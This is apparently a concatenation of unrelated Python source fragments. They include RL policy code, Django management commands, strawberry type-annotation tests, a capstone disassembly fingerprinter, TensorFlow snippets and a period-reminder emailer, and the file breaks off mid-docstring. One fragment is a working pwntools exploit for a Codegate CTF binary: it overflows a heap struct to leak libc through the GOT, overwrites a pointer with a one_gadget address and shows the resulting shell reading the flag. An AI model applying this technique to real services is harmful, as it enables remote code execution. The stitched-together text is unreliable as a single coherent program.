        with self.assertRaisesRegexp(RuntimeError, 'invalid SimpleQuote'):
            x = quote.value

        # test quote reset
        quote.value = 1.
        quote.reset()
        self.assertFalse(quote.is_valid)
        with self.assertRaisesRegexp(RuntimeError, 'invalid SimpleQuote'):
            x = quote.value
438969
from ray.rllib.utils.annotations import override

from marltoolbox.algos.amTFT import base_policy, policy_using_rollouts


class InversedAmTFTRolloutsTorchPolicy(
        policy_using_rollouts.AmTFTRolloutsTorchPolicy):
    """
    Instead of simulating the opponent, simulate our own policy
    and act as if it was the opponent.
    """

    def _init_for_rollout(self, config):
        super()._init_for_rollout(config)
        self.ag_id_rollout_reward_to_read = self.own_policy_id

    @override(base_policy.AmTFTPolicyBase)
    def _get_information_from_opponent(self, agent_id, agent_ids, episode):
        own_agent_id = agent_id
        own_a = episode.last_action_for(own_agent_id)
        return self.own_previous_obs, self.both_previous_raw_obs, own_a

    @override(policy_using_rollouts.AmTFTRolloutsTorchPolicy)
    def _switch_own_and_opp(self, agent_id):
        output = super()._switch_own_and_opp(agent_id)
        self.use_opponent_policies = not self.use_opponent_policies
        return output

    # @override(policy_using_rollouts.AmTFTRolloutsTorchPolicy)
    # def _select_algo_to_use_in_eval(self):
    #     assert self.performing_rollouts
    #
    #     if not self.use_opponent_policies:
    #         if self.n_steps_to_punish == 0:
    #             self.active_algo_idx = base.OPP_COOP_POLICY_IDX
    #         elif self.n_steps_to_punish > 0:
    #             self.active_algo_idx = base.OPP_SELFISH_POLICY_IDX
    #             self.n_steps_to_punish -= 1
    #         else:
    #             raise ValueError("self.n_steps_to_punish can't be below zero")
    #     else:
    #         # assert self.performing_rollouts
    #         if self.n_steps_to_punish_opponent == 0:
    #             self.active_algo_idx = base.OWN_COOP_POLICY_IDX
    #         elif self.n_steps_to_punish_opponent > 0:
    #             self.active_algo_idx = base.OWN_SELFISH_POLICY_IDX
    #             self.n_steps_to_punish_opponent -= 1
    #         else:
    #             raise ValueError("self.n_steps_to_punish_opp "
    #                              "can't be below zero")

    # @override(policy_using_rollouts.AmTFTRolloutsTorchPolicy)
    # def _init_for_rollout(self, config):
    #     super()._init_for_rollout(config)
    #     # the policies stored as opponent_policies are our own policy
    #     # (not the opponent's policies)
    #     self.use_opponent_policies = False

    # @override(policy_using_rollouts.AmTFTRolloutsTorchPolicy)
    # def _prepare_to_perform_virtual_rollouts_in_env(self, worker):
    #     outputs = super()._prepare_to_perform_virtual_rollouts_in_env(
    #         worker)
    #     # the policies stored as opponent_policies are our own policy
    #     # (not the opponent's policies)
    #     self.use_opponent_policies = True
    #     return outputs

    # @override(policy_using_rollouts.AmTFTRolloutsTorchPolicy)
    # def _stop_performing_virtual_rollouts_in_env(self, n_steps_to_punish):
    #     super()._stop_performing_virtual_rollouts_in_env(n_steps_to_punish)
    #     # the policies stored as opponent_policies are our own policy
    #     # (not the opponent's policies)
    #     self.use_opponent_policies = True

    # @override(policy_using_rollouts.AmTFTRolloutsTorchPolicy)
    # def compute_actions(
    #         self,
    #         obs_batch: Union[List[TensorType], TensorType],
    #         state_batches: Optional[List[TensorType]] = None,
    #         prev_action_batch: Union[List[TensorType], TensorType] = None,
    #         prev_reward_batch: Union[List[TensorType], TensorType] = None,
    #         info_batch: Optional[Dict[str, list]] = None,
    #         episodes: Optional[List["MultiAgentEpisode"]] = None,
    #         explore: Optional[bool] = None,
    #         timestep: Optional[int] = None,
    #         **kwargs) -> \
    #         Tuple[TensorType, List[TensorType], Dict[str, TensorType]]:
    #
    #     # Option to overwrite action during internal rollouts
    #     if self.use_opponent_policies:
    #         if len(self.overwrite_action) > 0:
    #             actions, state_out, extra_fetches = \
    #                 self.overwrite_action.pop(0)
    #             if self.verbose > 1:
    #                 print("overwrite actions", actions, type(actions))
    #             return actions, state_out, extra_fetches
    #
    #     return super().compute_actions(
    #         obs_batch, state_batches, prev_action_batch, prev_reward_batch,
    #         info_batch, episodes, explore, timestep, **kwargs)

    #     debit = self._compute_debit(
    #         last_obs, opp_action, worker, base_env,
    #         episode, env_index, coop_opp_simulated_action)

    #     self.n_steps_to_punish = self._compute_punishment_duration(
    #         opp_action,
    #         coop_opp_simulated_action,
    #         worker,
    #         last_obs)
438980
import os.path
import sys
import traceback

from gamescript import start

main_dir = os.path.split(os.path.abspath(__file__))[0]

if __name__ == "__main__":
    try:  # for printing an error log when an exception happens
        runmenu = start.Mainmenu(main_dir)
        runmenu.run()
    except Exception:  # Save error output to txt file
        traceback.print_exc()
        f = open("error_report.txt", "w")
        sys.stdout = f
        exc_type, exc_value, exc_traceback = sys.exc_info()
        lines = traceback.format_exception(exc_type, exc_value, exc_traceback)
        print("".join("!! " + line for line in lines))  # Log it or whatever here
        f.close()
439019
from pwn import *

r = remote("ch41l3ng3s.codegate.kr", 3333)

def add(name, profile):
    r.sendline(name)
    print r.recvuntil("profile")
    r.sendline(profile)
    print r.recvuntil(">> ")

def sell(idx):
    r.sendline("S")
    print r.recvuntil("(number)")
    r.sendline(str(idx))
    print r.recvuntil("?")
    r.sendline("S")
    print r.recvuntil(">> ")

def buy(size, name, profile):
    r.sendline("B")
    print r.recvuntil(">>")
    r.sendline(str(size))
    print r.recvuntil(">>")
    r.sendline("P")
    add(name, profile)

def modify(idx, prof):
    r.sendline("V")
    print r.recvuntil(">> ")
    r.sendline(str(idx))
    print r.recvuntil(">> ")
    r.sendline("M")
    print r.recvuntil(">> ")
    r.sendline(prof)
    print r.recvuntil(">> ")

print r.recvuntil(">> ")
for i in range(20):
    r.sendline("show me the marimo")

add("asdf", "asdf")
sell(0)
buy(1, "aaaa", "aaaaa")
buy(10, "bbbb", "bbbbb")
sleep(14)
modify(0, "A"*0x30 + p32(0x0) + p32(0x1000) + p64(0x603018) + p64(0x603018))
r.sendline("B")
r.sendline("V")
r.sendline("1")
rv = r.recvuntil("\x7f")[-6:]
libc = u64(rv + "\x00\x00")
libc_base = libc - 0x6f690
one_shot = libc_base + 0x45216
print r.recvuntil("ack ?")
print r.recvuntil(">>")
r.sendline("M")
print r.recvuntil(">> ")
r.sendline(p64(one_shot))
r.interactive()

'''
[*] Switching to interactive mode
$ id
uid=1000(marimo) gid=1000(marimo) groups=1000(marimo)
$ ls
flag
marimo
$ cat flag
But_every_cat_is_more_cute_than_Marimo
$
'''
439020
from django.core.management.base import BaseCommand from kong.models import Test from kong.models import Site, Type from optparse import OptionParser, make_option class Command(BaseCommand): option_list = BaseCommand.option_list + ( make_option("-t", "--test", dest="test"), make_option("-s", "--site", dest="site"), make_option("-T", "--type", dest="type"), make_option("-l", "--list", dest="list", action="store_true", default=False), ) def handle(self, *args, **options): TEST = options.get('test') SITE = options.get('site') TYPE = options.get('type') LIST = options.get('list') passed = True if TEST: print "Running test: %s" % TEST test = Test.objects.get(slug=TEST) passed = test.run_tests() elif TYPE: print "Running tests for type : %s" % TYPE type = Type.objects.get(slug=TYPE) passed = type.run_tests() elif SITE: print "Running tests for site : %s" % SITE site = Site.objects.get(slug=SITE) passed = site.run_tests() elif LIST: print "All Sites:" for site in Site.objects.all(): print site.slug print "All Tests:" for test in Test.objects.all(): print test.slug else: print "Running tests for all sites" for site in Site.objects.all(): passed = site.run_tests() #This is mainly for Nagios reporting. if passed: return 0 else: return 2
439030
from typing import List, Optional, TypeVar import strawberry from strawberry.annotation import StrawberryAnnotation from strawberry.type import StrawberryList, StrawberryOptional, StrawberryTypeVar def test_basic_string(): annotation = StrawberryAnnotation("str") resolved = annotation.resolve() assert resolved is str def test_list_of_string(): annotation = StrawberryAnnotation(List["int"]) resolved = annotation.resolve() assert isinstance(resolved, StrawberryList) assert resolved.of_type is int assert resolved == StrawberryList(of_type=int) assert resolved == List[int] def test_list_of_string_of_type(): @strawberry.type class NameGoesHere: foo: bool annotation = StrawberryAnnotation(List["NameGoesHere"], namespace=locals()) resolved = annotation.resolve() assert isinstance(resolved, StrawberryList) assert resolved.of_type is NameGoesHere assert resolved == StrawberryList(of_type=NameGoesHere) assert resolved == List[NameGoesHere] def test_optional_of_string(): annotation = StrawberryAnnotation(Optional["bool"]) resolved = annotation.resolve() assert isinstance(resolved, StrawberryOptional) assert resolved.of_type is bool assert resolved == StrawberryOptional(of_type=bool) assert resolved == Optional[bool] def test_string_of_object(): @strawberry.type class StrType: thing: int annotation = StrawberryAnnotation("StrType", namespace=locals()) resolved = annotation.resolve() assert resolved is StrType def test_string_of_type_var(): T = TypeVar("T") annotation = StrawberryAnnotation("T", namespace=locals()) resolved = annotation.resolve() assert isinstance(resolved, StrawberryTypeVar) assert resolved.type_var is T assert resolved == T def test_string_of_list(): namespace = {**locals(), **globals()} annotation = StrawberryAnnotation("List[float]", namespace=namespace) resolved = annotation.resolve() assert isinstance(resolved, StrawberryList) assert resolved.of_type is float assert resolved == StrawberryList(of_type=float) assert resolved == List[float] def test_string_of_list_of_type(): @strawberry.type class BlahBlah: foo: bool namespace = {**locals(), **globals()} annotation = StrawberryAnnotation("List[BlahBlah]", namespace=namespace) resolved = annotation.resolve() assert isinstance(resolved, StrawberryList) assert resolved.of_type is BlahBlah assert resolved == StrawberryList(of_type=BlahBlah) assert resolved == List[BlahBlah] def test_string_of_optional(): namespace = {**locals(), **globals()} annotation = StrawberryAnnotation("Optional[int]", namespace=namespace) resolved = annotation.resolve() assert isinstance(resolved, StrawberryOptional) assert resolved.of_type is int assert resolved == StrawberryOptional(of_type=int) assert resolved == Optional[int] # TODO: Move to object tests to test namespace logic def test_basic_types(): @strawberry.type class Query: name: "str" age: "int" definition = Query._type_definition assert definition.name == "Query" [field1, field2] = definition.fields assert field1.python_name == "name" assert field1.type is str assert field2.python_name == "age" assert field2.type is int # TODO: Move to object tests to test namespace logic def test_optional(): @strawberry.type class Query: name: "Optional[str]" age: "Optional[int]" definition = Query._type_definition assert definition.name == "Query" [field1, field2] = definition.fields assert field1.python_name == "name" assert isinstance(field1.type, StrawberryOptional) assert field1.type.of_type is str assert field2.python_name == "age" assert isinstance(field2.type, StrawberryOptional) assert field2.type.of_type 
is int # TODO: Move to object tests to test namespace logic def test_basic_list(): @strawberry.type class Query: names: "List[str]" definition = Query._type_definition assert definition.name == "Query" [field] = definition.fields assert field.python_name == "names" assert isinstance(field.type, StrawberryList) assert field.type.of_type is str # TODO: Move to object tests to test namespace logic def test_list_of_types(): global User @strawberry.type class User: name: str @strawberry.type class Query: users: "List[User]" definition = Query._type_definition assert definition.name == "Query" [field] = definition.fields assert field.python_name == "users" assert isinstance(field.type, StrawberryList) assert field.type.of_type is User del User
439035
base_product_page_url = 'https://www.amazon.com/gp/product/' base_amazon_url = 'https://www.amazon.com/' base_questions_url = 'https://www.amazon.com/ask/questions/asin/'
439049
import sys import numpy as np import pytest from baal.utils.plot_utils import make_animation_from_data @pytest.mark.skipif(sys.platform == "darwin", reason="Does not work on Mac.") def test_make_animation_from_data(): x = np.random.rand(4, 2) y = np.random.rand(4) labelled_at = np.random.randint(0, 4, size=[x.shape[0]]) classes = ['pos', 'neg'] result = make_animation_from_data(x, y, labelled_at, classes) assert isinstance(result, list) assert result[0].shape[2] == 3 if __name__ == '__main__': pytest.main()
439075
import sys
import re
import os
import subprocess
import collections
import json
import binascii
import base64

from capstone import *
from capstone.x86_const import *
from capstone.arm_const import *

ARCH = CS_ARCH_ARM
#MODE = CS_MODE_64

if ARCH == CS_ARCH_X86:
    md = Cs(CS_ARCH_X86, MODE)
elif ARCH == CS_ARCH_ARM:
    md = Cs(CS_ARCH_ARM, CS_MODE_ARM)
md.detail = True


class Fin:
    def __init__(self, path):
        self.path = path

    def fin_operand_x86(self, ods):
        odfin = list()
        for od in ods:
            if od.type == X86_OP_REG:
                odfin.append((od.type, od.value.reg))
            elif od.type == X86_OP_MEM:
                odfin.append((od.type,
                              od.value.mem.base,
                              od.value.mem.index,
                              od.value.mem.scale,
                              od.value.mem.disp))
            elif od.type == X86_OP_IMM:
                odfin.append((od.type, od.value.imm))
        return odfin

    def fin_operand_arm(self, ods):
        odfin = list()
        for od in ods:
            if od.type == ARM_OP_REG:
                odfin.append((od.type, od.value.reg))
            elif od.type == ARM_OP_MEM:
                odfin.append((od.type,
                              od.value.mem.base,
                              od.value.mem.index,
                              od.value.mem.scale,
                              od.value.mem.disp))
            elif od.type == ARM_OP_IMM:
                odfin.append((od.type, od.value.imm))
            else:
                odfin.append([od.type])
        return odfin

    def fin_ins(self, ins):
        if ARCH == CS_ARCH_X86:
            odfin = self.fin_operand_x86(ins.operands)
        elif ARCH == CS_ARCH_ARM:
            odfin = self.fin_operand_arm(ins.operands)
        return (ins.id, odfin)

    def fin_blk(self, blk):
        md.mode = blk['mode']
        opfin = list()
        for ins in md.disasm(blk['code'], 0x0):
            opfin.append(self.fin_ins(ins))
        return opfin

    def get_elf_funclist(self):
        return json.loads(open(self.path, 'r').read())

    def get_sym_funclist(self):
        return list(filter(lambda x: not x['name'].startswith('sub_'),
                           json.loads(open(self.path, 'r').read())))

    def gen_fin(self, funclist):
        funcfin = dict()
        for func in funclist:
            name = func['name']
            print(name)
            blkdic = {}
            for blk in func['bb']:
                blk['code'] = base64.b64decode(blk['code'])
                if ARCH == CS_ARCH_X86:
                    blk['mode'] = MODE
                elif ARCH == CS_ARCH_ARM:
                    if blk['mode'] == 1:
                        blk['mode'] = CS_MODE_THUMB
                    else:
                        blk['mode'] = CS_MODE_ARM
                blkdic[blk['offset']] = blk
            blkfin = list()
            blkvis = set()
            worklist = collections.deque()
            worklist.append(func['offset'])
            while len(worklist) > 0:
                addr = worklist.popleft()
                if addr in blkvis:
                    continue
                blkvis.add(addr)
                blk = blkdic[addr]
                succ = list(blk['succ'])
                succ.sort()
                worklist.extend(succ)
                blkfin.append(self.fin_blk(blk))
            funcfin[func['name']] = (func['offset'], blkfin)
        return funcfin


'''
mergefin = dict()
for FILE in sys.argv[1:]:
    print(FILE)
    fin = Fin(FILE)
    funcfin = fin.gen_fin(fin.get_sym_funclist())
    mergefin.update(funcfin)
open('merge.fin','w').write(json.dumps(mergefin))
print(len(mergefin))
'''

FILE = sys.argv[1]
fin = Fin(FILE)
funcfin = fin.gen_fin(fin.get_elf_funclist())
open(FILE + '.fin', 'w').write(json.dumps(funcfin))
print(len(funcfin))
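# Tiny sanity-check sketch for the ARM fingerprinting path (the bytes are
# hand-assembled "mov r0, #1; bx lr"; the exact operand IDs in the output
# depend on the installed capstone version):
#
# fin = Fin('dummy.json')
# print(fin.fin_blk({'mode': CS_MODE_ARM,
#                    'code': b'\x01\x00\xa0\xe3\x1e\xff\x2f\xe1'}))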
439082
from functools import reduce

import pandas as pd
from scipy import stats


def tabulate_predecessor_fitness(predecessor_df):

    # root id 0 marks the control competitors (i.e., the predecessors),
    # so keep only the focal root id 1 rows
    predecessor_df = predecessor_df[
        predecessor_df['Root ID'] == 1
    ].reset_index()

    predecessor_df['Series'] = predecessor_df['genome series']

    mean_differential = predecessor_df.groupby(
        ['Series'],
    )['Fitness Differential'].mean().reset_index(
        name='Mean Fitness Differential Against Predecessor',
    )

    frac_won = predecessor_df.groupby(
        ['Series'],
    )['Fitness Differential'].apply(
        lambda just_one_series:
            (just_one_series > 0).sum() / len(just_one_series),
    ).reset_index(
        name='Fraction Predecessor Competitions Won',
    )

    null_p = predecessor_df.groupby(
        ['Series'],
    )['Fitness Differential'].apply(
        lambda just_one_series: stats.binom_test(
            x=(just_one_series > 0).sum(),  # number of successes
            n=len(just_one_series),  # number of trials
            p=0.5,
            alternative='two-sided',
        ),
    ).reset_index(
        name='Predecessor Competition Null p-value',
    )

    return reduce(
        lambda left, right: pd.merge(
            left,
            right,
            on='Series',
        ),
        [
            mean_differential,
            frac_won,
            null_p,
        ],
    )
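# Minimal usage sketch (the data below is made up for illustration; the real
# input comes from the competition pipeline). Rows with Root ID == 1 are the
# focal competitors, and a positive 'Fitness Differential' counts as a win
# over the predecessor.
if __name__ == '__main__':
    demo = pd.DataFrame({
        'Root ID': [1, 1, 1, 1, 0],
        'genome series': ['a', 'a', 'b', 'b', 'a'],
        'Fitness Differential': [0.3, -0.1, 0.5, 0.2, 0.0],
    })
    # one row per Series: mean differential, fraction won, and the two-sided
    # binomial-test p-value against the null of winning half the time
    print(tabulate_predecessor_fitness(demo))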
439086
from .ext import Admin from .ui.decorators import admin_required from .api.decorators import admin_required_api from . import cli __all__ = ["Admin", "admin_required", "admin_required_api", "cli"]
439090
import FWCore.ParameterSet.Config as cms process = cms.Process("reader") process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) ) process.load("FWCore.MessageLogger.MessageLogger_cfi") process.MessageLogger.cout.placeholder = cms.untracked.bool(False) process.MessageLogger.cout.threshold = cms.untracked.string('INFO') process.MessageLogger.debugModules = cms.untracked.vstring('*') process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) ) process.source = cms.Source("EmptySource", firstRun= cms.untracked.uint32(298313), numberEventsInLuminosityBlock = cms.untracked.uint32(200), numberEventsInRun = cms.untracked.uint32(0) ) process.rawDataCollector = cms.EDProducer('CSCFileReader', firstEvent = cms.untracked.int32(0), FED856 = cms.untracked.vstring('RUI33'), RUI33 = cms.untracked.vstring('/tmp/barvic/csc_00298313_EmuRUI33_Local_000.raw') ) process.FEVT = cms.OutputModule("PoolOutputModule", fileName = cms.untracked.string("/tmp/barvic/csc_00298313_GEM_Test.root"), outputCommands = cms.untracked.vstring("keep *") ) process.p = cms.Path( process.rawDataCollector) process.outpath = cms.EndPath(process.FEVT)
439093
import feedparser

import alkali
from alkali import fields


class RssLoader(alkali.Storage):

    def __init__(self, url):
        self.filename = url

    def read(self, model_class):
        feed = feedparser.parse(self.filename)
        for item in feed['items']:
            yield item


class Episode(alkali.Model):

    class Meta:
        storage = RssLoader('https://pythonbytes.fm/episodes/rss')

    guid = fields.UUIDField(primary_key=True)
    title = fields.StringField()
    published = fields.DateTimeField()
    itunes_episode = fields.IntField()
    link = fields.StringField()
    description = fields.StringField()

    def __str__(self):
        return f"<Episode {self.itunes_episode} - {self.title}>"

    @property
    def num(self):
        return self.itunes_episode


db = alkali.Database(models=[Episode])
db.load()

# or directly but non-traditionally
# Episode.objects.load(Episode.Meta.storage)

print("last 10 episodes with 'python' in the title")
for ep in Episode.objects.filter(title__rei=r"\bpython\b").order_by('-published').limit(10):
    print(' ', ep)

print("total episode count:", Episode.objects.count)

e = Episode.objects.get(itunes_episode=100)
print(e.title, e.published.date())

print("episode featuring alkali:", Episode.objects.get(title__rei='alkali').link)
439111
import numpy as np

from .dc_motor import DcMotor


class DcShuntMotor(DcMotor):
    """The DcShuntMotor is a DC motor with parallel armature and exciting circuit connected to one input voltage.

    =====================  ==========  =============  ===========================================
    Motor Parameter        Unit        Default Value  Description
    =====================  ==========  =============  ===========================================
    r_a                    Ohm         16e-3          Armature circuit resistance
    r_e                    Ohm         4e-1           Exciting circuit resistance
    l_a                    H           19e-6          Armature circuit inductance
    l_e                    H           5.4e-3         Exciting circuit inductance
    l_e_prime              H           1.7e-3         Effective excitation inductance
    j_rotor                kg/m^2      0.0025         Moment of inertia of the rotor
    =====================  ==========  =============  ===========================================

    =============== ====== =============================================
    Motor Currents  Unit   Description
    =============== ====== =============================================
    i_a             A      Armature circuit current
    i_e             A      Exciting circuit current
    =============== ====== =============================================
    =============== ====== =============================================
    Motor Voltages  Unit   Description
    =============== ====== =============================================
    u               V      Voltage applied to both circuits
    =============== ====== =============================================

    ======== ===========================================================
    Limits / Nominal Value Dictionary Entries:
    -------- -----------------------------------------------------------
    Entry    Description
    ======== ===========================================================
    i_a      Armature current
    i_e      Exciting current
    omega    Angular Velocity
    torque   Motor generated torque
    u        Voltage
    ======== ===========================================================
    """
    HAS_JACOBIAN = True
    VOLTAGES = ['u']

    # Motor parameter, nominal values and limits are based on the following DC Motor:
    # https://www.heinzmann-electric-motors.com/en/products/dc-motors/pmg-132-dc-motor
    _default_motor_parameter = {
        'r_a': 16e-3, 'r_e': 4e-1, 'l_a': 19e-6, 'l_e_prime': 1.7e-3, 'l_e': 5.4e-3, 'j_rotor': 0.0025
    }
    _default_nominal_values = dict(omega=300, torque=16.0, i=97, i_a=97, i_e=97, u=60, u_a=60, u_e=60)
    _default_limits = dict(omega=400, torque=38.0, i=210, i_a=210, i_e=210, u=60, u_a=60, u_e=60)
    _default_initializer = {
        'states': {'i_a': 0.0, 'i_e': 0.0},
        'interval': None,
        'random_init': None,
        'random_params': (None, None)
    }

    def i_in(self, state):
        # Docstring of superclass
        return [state[self.I_A_IDX] + state[self.I_E_IDX]]

    def electrical_ode(self, state, u_in, omega, *_):
        # Docstring of superclass
        return super().electrical_ode(state, (u_in[0], u_in[0]), omega)

    def electrical_jacobian(self, state, u_in, omega, *_):
        mp = self._motor_parameter
        return (
            np.array([
                [-mp['r_a'] / mp['l_a'], -mp['l_e_prime'] / mp['l_a'] * omega],
                [0, -mp['r_e'] / mp['l_e']]
            ]),
            np.array([-mp['l_e_prime'] * state[self.I_E_IDX] / mp['l_a'], 0]),
            np.array([mp['l_e_prime'] * state[self.I_E_IDX], mp['l_e_prime'] * state[self.I_A_IDX]])
        )

    def get_state_space(self, input_currents, input_voltages):
        """
        Calculate the possible normalized state space for the motor as a tuple of dictionaries "low" and "high".

        Args:
            input_currents: The converters possible output currents.
            input_voltages: The converters possible output voltages.

        Returns:
            tuple(dict,dict): Dictionaries defining if positive and negative values are possible for each motor's state.
        """
        low = {
            'omega': 0,
            'torque': -1 if input_currents.low[0] == -1 else 0,
            'i_a': -1 if input_currents.low[0] == -1 else 0,
            'i_e': -1 if input_currents.low[0] == -1 else 0,
            'u': -1 if input_voltages.low[0] == -1 else 0,
        }
        high = {
            'omega': 1,
            'torque': 1,
            'i_a': 1,
            'i_e': 1,
            'u': 1,
        }
        return low, high

    def _update_limits(self, limits_d=None, nominal_d=None):
        # Docstring of superclass

        # R_a might be 0, protect against that
        r_a = 1 if self._motor_parameter['r_a'] == 0 else self._motor_parameter['r_a']

        limit_agenda = {
            'u': self._default_limits['u'],
            'i_a': self._limits.get('i', None) or self._limits['u'] / r_a,
            'i_e': self._limits.get('i', None) or self._limits['u'] / self.motor_parameter['r_e'],
        }
        super()._update_limits(limit_agenda)
439116
import tensorflow as tf

mat1 = tf.constant([[4, 5, 6], [3, 2, 1]])
mat2 = tf.constant([[7, 8, 9], [10, 11, 12]])

# hadamard product (element wise)
mult = tf.multiply(mat1, mat2)

# dot product (inner dimensions must match, hence the transpose)
dotprod = tf.matmul(mat1, tf.transpose(mat2))

with tf.Session() as sess:
    print(sess.run(mult))
    print(sess.run(dotprod))
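# Expected output (computed by hand from the constants above):
#   mult    -> [[28 40 54]
#               [30 22 12]]
#   dotprod -> [[122 167]
#               [ 46  64]]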
439128
import datetime from django.conf import settings from django.core.management.base import BaseCommand from django.template.loader import get_template from periods import models as period_models, email_sender, helpers class Command(BaseCommand): help = 'Notify users of upcoming periods' def _format_date(self, date_value): return date_value.strftime('%A %B %d, %Y') def handle(self, *args, **options): users = period_models.User.objects.filter( is_active=True, flow_events__isnull=False, statistics__isnull=False).exclude( send_emails=False).distinct() for user in users: today = period_models.today() upcoming_events = user.statistics.predicted_events if not upcoming_events: continue # The upcoming events are in date order, ovulation/period/ovulation/... expected_date = upcoming_events[1]['timestamp'] calendar_start_date = expected_date - datetime.timedelta(days=7) expected_in = (expected_date - today.date()).days expected_abs = abs(expected_in) if expected_abs == 1: day = 'day' else: day = 'days' context = { 'full_name': user.get_full_name(), 'today': self._format_date(today), 'expected_in': expected_abs, 'day': day, 'expected_date': self._format_date(expected_date), 'calendar_start_date': self._format_date(calendar_start_date), 'admin_name': settings.ADMINS[0][0], 'full_domain': helpers.get_full_domain(), } subject = '' if expected_in < 0: subject = "Period was expected %s %s ago" % (expected_abs, day) template_name = 'expected_ago' elif expected_in == 0: subject = "Period today!" template_name = 'expected_now' elif expected_in < 4: subject = "Period starting" template_name = 'expected_in' elif expected_in == user.luteal_phase_length: subject = "Ovulation today!" template_name = 'ovulating' if subject: plaintext = get_template('periods/email/%s.txt' % template_name) html = get_template('periods/email/%s.html' % template_name) email_sender.send(user, subject, plaintext.render(context), html.render(context))
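# Worked examples of the subject selection above (values are illustrative,
# assuming a typical luteal phase length of 14 days):
#   expected_in == -2                        -> "Period was expected 2 days ago"
#   expected_in == 0                         -> "Period today!"
#   expected_in == 2                         -> "Period starting"
#   expected_in == user.luteal_phase_length  -> "Ovulation today!"
# Any other value leaves `subject` empty, so no email is sent.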
439142
import sqlalchemy as sa from mealie.db.models.model_base import SqlAlchemyBase class Note(SqlAlchemyBase): __tablename__ = "notes" id = sa.Column(sa.Integer, primary_key=True) parent_id = sa.Column(sa.Integer, sa.ForeignKey("recipes.id")) title = sa.Column(sa.String) text = sa.Column(sa.String) def __init__(self, title, text) -> None: self.title = title self.text = text
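# Hypothetical usage sketch (the engine/session setup below is made up for
# illustration; in the application the session comes from mealie's database
# layer, and parent_id links the note to a recipe):
#
# from sqlalchemy.orm import sessionmaker
# engine = sa.create_engine("sqlite://")
# session = sessionmaker(bind=engine)()
# note = Note(title="Tip", text="Preheat the oven first.")
# session.add(note)
# session.commit()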
439187
import unittest from loa.unit import Unit from loa.team import Team from loa.team import TeamExaminer def get_team(): return MyTeam("👑") class Pawn(Unit): HP = 20.0001 # Hit Points (health points) ATT = 10 # Attack ARM = 0 # Armor EVS = 0 # Evasion def __init__(self, team, name, pos): cls = __class__ super().__init__(team, name, pos, hp=cls.HP, att=cls.ATT, arm=cls.ARM, evs=cls.EVS) class Queen(Unit): HP = 100 # Hit Points (health points) ATT = 40 # Attack ARM = 6.6666 # Armor EVS = 0 # Evasion def __init__(self, team, name, pos): cls = __class__ super().__init__(team, name, pos, hp=cls.HP, att=cls.ATT, arm=cls.ARM, evs=cls.EVS) class MyTeam(Team): def initialize(self): for i in range(4): unit = Pawn(self, "Pawn%02d"%(i+1), i) self.units.append(unit) for i in range(6): unit = Queen(self, "Queen%02d"%(i+1), i+4) self.units.append(unit) def arrange(self, enemy: Team): for i in range(self.num_positions): e_att=0 e_pos=0 if self.units[i]!=None: if self.units[i].att==40: for j in range(enemy.num_positions): if enemy.units[j]!=None: if enemy.units[j].att>=e_att: if self.units[j]!=None: if self.units[j].att!=40: e_att=enemy.units[j].att e_pos=j elif self.units[j]==None: e_att=enemy.units[j].att e_pos=j if self.units[e_pos]!=None: temp=self.units[e_pos] self.units[e_pos]=self.units[i] self.units[e_pos].pos=e_pos self.units[i]=temp self.units[i].pos=i else: self.units[e_pos]=self.units[i] self.units[e_pos].pos=e_pos self.units[i]=None class TestTeam(unittest.TestCase): def test_team(self): team=MyTeam("👑") examiner=TeamExaminer() examiner.check(team) examiner.check(team) if __name__ == "__main__": unittest.main()
439191
from ....Common.DyStockCommon import *
from ....Common.Ui.Basic.DyStockTableWidget import *


class DyStockDataFocusInfoPoolWidget(DyStockTableWidget):
    """ focus info pool widget """

    header = ['热点',  # if a stock carries several focuses, only the strongest one counts as its focus
              '热点强度',  # strength of this focus in the whole market
              '热点涨幅(%)',  # average gain of the stocks tracked by this focus
              '热点涨停数',
              '热点涨停数占比(%)',
              '热点股票数',
              '龙头涨幅(%)',  # average gain of the first, second and third dragon (leading) stocks
              '龙一',
              '龙二',
              '龙三',
              ]

    def __init__(self, dataViewer, date, focusInfoPool):
        super().__init__(dataViewer.eventEngine,
                         name='热点',
                         baseDate=date
                         )

        self._focusInfoPool = focusInfoPool
        self._dragonsMap = {}  # {name: code}

        self._initUi()

    def _getDragons(self, focusInfo):
        data = [None]*3

        for i, (code, name) in enumerate(focusInfo.dragons):
            data[i] = name
            self._dragonsMap[name] = code

        return data

    def _initUi(self):
        self.setWindowTitle('热点[{0}]'.format(self._baseDate))
        self.setColNames(self.header)

        rows = []
        focusList = sorted(self._focusInfoPool, key=lambda k: self._focusInfoPool[k].strength, reverse=True)
        for focus in focusList:
            focusInfo = self._focusInfoPool[focus]

            row = [focus,
                   focusInfo.strength,
                   focusInfo.increase,
                   focusInfo.limitUpNbr,
                   focusInfo.limitUpNbr/len(focusInfo.codes)*100,
                   len(focusInfo.codes),
                   focusInfo.dragonIncrease,
                   ]

            row.extend(self._getDragons(focusInfo))

            rows.append(row)

        self.fastAppendRows(rows, '热点涨幅(%)')

    #---------------------------------------------- overridden by subclasses according to their own table format ----------------------------------------------
    def getDateCodeList(self):
        return None

    def getCodeList(self):
        return None

    def getCodePriceList(self):
        return None

    def getRightClickCodeDate(self):
        item = self.itemAt(self._rightClickPoint)
        if item is None:
            return None, None

        code = self._dragonsMap.get(item.text())
        if code is None:
            return None, None

        return code, self._baseDate

    def getRightClickCodeName(self):
        item = self.itemAt(self._rightClickPoint)
        if item is None:
            return None, None

        name = item.text()
        code = self._dragonsMap.get(name)
        if code is None:
            return None, None

        return code, name

    def getCodeDate(self, item):
        code = self._dragonsMap.get(item.text())
        if code is None:
            return None, None

        return code, self._baseDate
439210
from __future__ import print_function

import copy
import os
import re
import time
import warnings
from collections import OrderedDict
from contextlib import contextmanager
from logging import getLogger

import six
import tensorflow as tf

from tfsnippet.dataflows import DataFlow
from tfsnippet.utils import (StatisticsCollector, DisposableContext,
                             humanize_duration, ETA, EventSource,
                             TemporaryDirectory)
from .checkpoint import CheckpointSavableObject, CheckpointSaver
from .event_keys import EventKeys
from .logging_ import summarize_variables, DefaultMetricFormatter, MetricLogger

__all__ = ['TrainLoop']

EPOCH_TIME_METRIC = 'epoch_time'
STEP_TIME_METRIC = 'step_time'
TIME_METRIC_PATTERN = re.compile(r'.*(time|timer)$')

TRAIN_LOOP_STATES_CKPT_NAME = '$$/tfsnippet_train_loop_states_variable'
EARLY_STOPPING_STATES_CKPT_NAME = '$$/tfsnippet_early_stopping_states_variable'


class TrainLoopStates(CheckpointSavableObject):
    """
    Internal states of a :class:`TrainLoop`, which can be saved via
